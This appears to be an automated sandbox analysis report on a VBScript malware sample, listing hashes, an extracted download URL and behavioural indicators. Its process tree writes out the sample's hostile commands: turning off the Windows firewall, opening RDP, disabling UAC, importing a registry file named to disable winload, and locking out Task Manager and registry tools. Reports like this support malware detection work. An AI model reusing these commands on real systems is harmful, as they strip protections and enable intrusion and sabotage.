Analysis
-
max time kernel
109s -
max time network
97s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 17:07
Static task
static1
Behavioral task
behavioral1
Sample
malware.vbs
Resource
win7-20240215-en
Behavioral task
behavioral2
Sample
malware.vbs
Resource
win10v2004-20240426-en
General
-
Target
malware.vbs
-
Size
7KB
-
MD5
775f152b958147204f3cc3a4da63c6c8
-
SHA1
4814e610f5322f3a9a197c8fd2be170946732367
-
SHA256
638565ad01412f15dd5782af2fe1e685d91577ddd995e5eabf46916ed7a25cb9
-
SHA512
1bcaa377cabf089f072c8adca62a137ad5ca14ab71ddf3dda7c852ad4a841d5f1678128a0e3c2312d685af8edc5e5ea6189cba0282d93edee9fa1cdf519adc3c
-
SSDEEP
96:qD2WSNb8mN8r9f4PPfMSHnx2gqoAqb1j8RW8E/zmdPzWdEKuWP2W9Nukim26195F:qD8qrZgX7xrCdPidfbj2619z
Malware Config
Extracted
http://bonzi.link/Bon.zip
Signatures
-
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 6020 bcdedit.exe 6036 bcdedit.exe 4232 bcdedit.exe 6080 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 75 6072 powershell.exe -
Creates new service(s) 2 TTPs
-
Disables RegEdit via registry modification 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 10 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 2056 netsh.exe 5856 netsh.exe 5296 netsh.exe 5260 netsh.exe 5976 netsh.exe 1176 netsh.exe 408 netsh.exe 2168 netsh.exe 2620 netsh.exe 5708 netsh.exe -
Possible privilege escalation attempt 8 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exepid process 5636 takeown.exe 5976 icacls.exe 5928 takeown.exe 5944 icacls.exe 6076 takeown.exe 6072 icacls.exe 5588 takeown.exe 6080 icacls.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exepid process 6072 icacls.exe 5588 takeown.exe 6080 icacls.exe 5636 takeown.exe 5976 icacls.exe 5928 takeown.exe 5944 icacls.exe 6076 takeown.exe -
Drops file in System32 directory 19 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db OpenWith.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db OpenWith.exe -
Drops file in Windows directory 1 IoCs
Processes:
netsh.exedescription ioc process File created C:\Windows\rescache\_merged\431186354\3365242012.pri netsh.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exepid process 6056 sc.exe 5580 sc.exe -
Processes:
powershell.exepowershell.exepid process 6072 powershell.exe 6024 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5588 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 6112 ipconfig.exe 380 ipconfig.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5312 taskkill.exe 4424 taskkill.exe 3596 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
netsh.exereg.exereg.exereg.exeOpenWith.exereg.exereg.exeOpenWith.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execmd.exereg.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\1d5acdde7226641\a01460c8\@{Microsoft.AAD.BrokerPlugin_1000.19041.1023.0_neutral_neutral_cw5n1h2txyewy?ms-r = "Work or school account" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e53672e17460\a01460c8\@{Microsoft.Windows.PeopleExperienceHost_10.0.19041.1023_neutral_neut = "Windows Shell Experience" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.AppRep.ChxApp_cw5n1h2txyewy%5Cresources.pri\1d5acddee1afafc\a01460c8\@{Microsoft.Windows.Apprep.ChxApp_1000.19041.1023.0_neutral_neutral_cw5n1h2t = "Windows Defender SmartScreen" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wlansvc.dll,-36865 = "WLAN Service - WFD Services Kernel Mode Driver Rules" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d5acddea4e2414\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached OpenWith.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{4234D49B-0245-4DF3-B780-3893943456E1} {000214E6-0000-0000-C000-000000000046} 0xFFFF = 01000000000000008b9105210faada01 OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.XboxGameCallableUI_cw5n1h2txyewy%5Cresources.pri\1d5acdddadc1b8f\a01460c8 netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System\DisableCMD = "2" reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri\1d7e53665b78b3b\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8\@{Microsoft.Windows.ShellExperienceHost_10.0.19041.1023_neutral_neutral_cw5n1h2txyewy?ms = "Windows Shell Experience" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-53500 = "Recommended Troubleshooting" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@C:\Windows\System32\ieframe.dll,-55175 = "Internet Explorer" OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CParentalControls_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9001 = "BranchCache - Peer Discovery (Uses WSD)" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\Languages reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\International reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%systemroot%\system32\provsvc.dll,-202 = "HomeGroup" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy%5Cresources.pri\1d5ace438733a83\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@wifidisplay.dll,-100 = "Wireless Display" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisableSettingsPage = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5Cmicrosoft.windows.narratorquickstart_8wekyb3d8bbwe%5Cresources.pri\1d5acdded540f4d\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft reg.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableGPO = "1" reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Windows\System reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.Search_cw5n1h2txyewy%5Cresources.pri\1d7e5369da0bc36\a01460c8\@{Microsoft.Windows.Search_1.14.2.19041_neutral_neutral_cw5n1h2txyewy?ms-resource:/ = "Windows Search" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CShellExperienceHost_cw5n1h2txyewy%5Cresources.pri\1d7e5369a06a26c\a01460c8 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.LockApp_cw5n1h2txyewy%5Cresources.pri\1d7e5367a448984\a01460c8 netsh.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Win32WebViewHost_cw5n1h2txyewy%5Cresources.pri\1d5acdef0fedca\a01460c8 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\icsvc.dll,-700 = "Virtual Machine Monitoring" netsh.exe Key created \REGISTRY\USER\S-1-5-18_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCache reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.PeopleExperienceHost_cw5n1h2txyewy%5Cresources.pri netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy%5Cresources.pri\1d5acddeb9898a7\a01460c8 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\PreferredUILanguages = 720075002d005200550000000000 reg.exe Key created \REGISTRY\USER\.DEFAULT\Control Panel\Desktop reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@%SystemRoot%\system32\firewallapi.dll,-37302 = "mDNS" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MrtCache\C:%5CWindows%5CSystemApps%5CMicrosoft.AccountsControl_cw5n1h2txyewy%5Cresources.pri\1d7e5366768b0fd\a01460c8\@{Microsoft.AccountsControl_10.0.19041.1023_neutral__cw5n1h2txyewy?ms-resource://M = "Email and accounts" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\@peerdistsh.dll,-9003 = "BranchCache - Hosted Cache Client (Uses HTTPS)" netsh.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exepowershell.exepowershell.exepid process 2208 msedge.exe 2208 msedge.exe 2236 msedge.exe 2236 msedge.exe 5484 identity_helper.exe 5484 identity_helper.exe 6072 powershell.exe 6072 powershell.exe 6072 powershell.exe 6024 powershell.exe 6024 powershell.exe 6024 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
Processes:
msedge.exepid process 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
powercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exewhoami.exetakeown.exetakeown.exetakeown.exepowershell.exepowershell.exetaskkill.exetaskkill.exetaskkill.exedescription pid process Token: SeShutdownPrivilege 4260 powercfg.exe Token: SeCreatePagefilePrivilege 4260 powercfg.exe Token: SeShutdownPrivilege 4556 powercfg.exe Token: SeCreatePagefilePrivilege 4556 powercfg.exe Token: SeShutdownPrivilege 208 powercfg.exe Token: SeCreatePagefilePrivilege 208 powercfg.exe Token: SeShutdownPrivilege 4080 powercfg.exe Token: SeCreatePagefilePrivilege 4080 powercfg.exe Token: SeDebugPrivilege 2668 whoami.exe Token: SeTakeOwnershipPrivilege 5928 takeown.exe Token: SeShutdownPrivilege 4396 powercfg.exe Token: SeCreatePagefilePrivilege 4396 powercfg.exe Token: SeShutdownPrivilege 5304 powercfg.exe Token: SeCreatePagefilePrivilege 5304 powercfg.exe Token: SeShutdownPrivilege 5328 powercfg.exe Token: SeCreatePagefilePrivilege 5328 powercfg.exe Token: SeShutdownPrivilege 552 powercfg.exe Token: SeCreatePagefilePrivilege 552 powercfg.exe Token: SeDebugPrivilege 5856 whoami.exe Token: SeTakeOwnershipPrivilege 6076 takeown.exe Token: SeTakeOwnershipPrivilege 5588 takeown.exe Token: SeTakeOwnershipPrivilege 5636 takeown.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 6024 powershell.exe Token: SeDebugPrivilege 5312 taskkill.exe Token: SeDebugPrivilege 4424 taskkill.exe Token: SeDebugPrivilege 3596 taskkill.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
msedge.exepid process 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe 2236 msedge.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
OpenWith.exeOpenWith.exeOpenWith.exepid process 5264 OpenWith.exe 5576 OpenWith.exe 5848 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exenet.exedescription pid process target process PID 2140 wrote to memory of 2604 2140 cmd.exe net.exe PID 2140 wrote to memory of 2604 2140 cmd.exe net.exe PID 2604 wrote to memory of 960 2604 net.exe net1.exe PID 2604 wrote to memory of 960 2604 net.exe net1.exe PID 2140 wrote to memory of 4260 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 4260 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 4556 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 4556 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 208 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 208 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 4080 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 4080 2140 cmd.exe powercfg.exe PID 2140 wrote to memory of 2056 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 2056 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 1176 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 1176 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 408 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 408 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 2168 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 2168 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 2620 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 2620 2140 cmd.exe netsh.exe PID 2140 wrote to memory of 5056 2140 cmd.exe reg.exe PID 2140 wrote to memory of 5056 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4328 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4328 2140 cmd.exe reg.exe PID 2140 wrote to memory of 1284 2140 cmd.exe reg.exe PID 2140 wrote to memory of 1284 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2692 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2692 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3500 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3500 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3968 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3968 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2712 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2712 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2956 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2956 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3996 2140 cmd.exe reg.exe PID 2140 wrote to memory of 3996 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4276 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4276 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2328 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2328 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4804 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4804 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4896 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4896 2140 cmd.exe reg.exe PID 2140 wrote to memory of 5108 2140 cmd.exe reg.exe PID 2140 wrote to memory of 5108 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2100 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2100 2140 cmd.exe reg.exe PID 2140 wrote to memory of 1528 2140 cmd.exe reg.exe PID 2140 wrote to memory of 1528 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4860 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4860 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4288 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4288 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2176 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2176 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4340 2140 cmd.exe reg.exe PID 2140 wrote to memory of 4340 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2652 2140 cmd.exe reg.exe PID 2140 wrote to memory of 2652 2140 cmd.exe reg.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\malware.vbs"1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\malware.bat" "1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATACTIONCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setdcvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /setacvalueindex SCHEME_CURRENT SUB_BATTERY BATLEVELCRIT 02⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow RDP" dir=in action=allow protocol=TCP localport=33892⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Ping" dir=in action=allow protocol=ICMPv42⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="Allow Outbound" dir=out action=allow2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off2⤵
- Modifies Windows Firewall
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exeREG IMPORT "C:\Users\Admin\AppData\Local\Temp\disable_winload.reg"2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoManageMyComputerVerb /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0c09" /t REG_SZ /d "en-US" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCached\Languages" /v "0419" /t REG_SZ /d "ru-RU" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "en-US" /t REG_SZ /d "0c09" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKCU\Control Panel\Desktop\MuiCache" /v "ru-RU" /t REG_SZ /d "0419" /f2⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
-
